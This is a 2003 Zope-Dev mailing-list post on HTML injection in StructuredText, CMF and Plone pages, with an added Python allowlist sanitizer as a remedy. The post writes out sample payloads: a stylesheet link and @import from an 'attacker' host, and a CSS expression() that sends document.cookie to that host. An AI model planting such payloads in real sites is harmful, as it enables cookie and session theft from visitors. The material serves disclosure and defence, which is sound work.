On Mon, 23 Jun 2003 01:20:35 -0700
Jamie Heilman <[EMAIL PROTECTED]> wrote:

> http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt
> apps, and apart from 1 and 3 there are probably legitimate bugs there.

related issues:

CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a,
as far as the site permits anonymous users, or persons without good
references, to write.
To cope with the matter, I stupidly put in multiple string substitutions.

    import re

    # the same substitution, applied three times in a row as posted
    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)
    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)
    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)

It would be appreciated if someone could advise me of a more general
and smart way.

I know that Zope's StructuredText itself does not handle such a case,
and that kind of implementation may be left to each developer.
If it had the ability to avoid them, it would be much better, I think.

Another example:
 The following sample may allow malicious.css to be imported from outside
of the site. Put #1 or #2 in a StructuredText page.

 #1
 <LINK rel="stylesheet" href="http://attacker/malicious.css">

 #2
 <STYLE type="text/css">
 @import url('http://attacker/malicious.css');
 </STYLE>

 # example of malicious.css
  body { left: expression(eval(
        'document.location="http://attacker/"+document.cookie;')) }

For example, make a 'Document' in a CMFDefault site,
and put #1 in the reply form (DiscussionItem) against the original
document, etc. It seems CMFDefault is vulnerable to this attack.

Any general remedy for that kind of exploit?

Kazuya Fukamachi

Zope-Dev maillist  -  [EMAIL PROTECTED]
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://mail.zope.org/mailman/listinfo/zope )
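A more general remedy than repeating a regex substitution, as an added example that is not code from the post or from Zope: feed the user-contributed markup through an allowlist parser (Python's standard html.parser) and re-emit only known-safe tags and attributes, so that LINK, STYLE, IFRAME and every other unlisted tag is dropped rather than renamed and a single pass is enough. The allowlist and the safe href prefixes are assumptions chosen for this example.

```python
from html import escape
from html.parser import HTMLParser

# Allowlist (an assumption for this example): everything not listed is dropped,
# not renamed, so one pass suffices and there is nothing left to re-match.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li", "pre", "code", "br"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
SAFE_HREF_PREFIXES = ("http://", "https://", "mailto:", "/", "#")
DROP_WITH_CONTENT = {"style", "script"}   # their text is CSS/JS, not prose

class AllowlistSanitizer(HTMLParser):
    """Re-emit only allowlisted tags and attributes; all text is HTML-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside a <style>/<script> being dropped

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:      # link, iframe, img, unknown ... dropped
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                 # onclick=, style=, etc. never survive
            if name == "href" and not value.lower().startswith(SAFE_HREF_PREFIXES):
                continue                 # rejects javascript:, data:, vbscript:
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:          # CSS/JS bodies are discarded entirely
            self.out.append(escape(data, quote=False))

def sanitize(markup: str) -> str:
    p = AllowlistSanitizer()
    p.feed(markup)
    p.close()
    return "".join(p.out)
```

An unclosed `<style>` swallows the rest of the input, which is the safe failure for untrusted markup.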
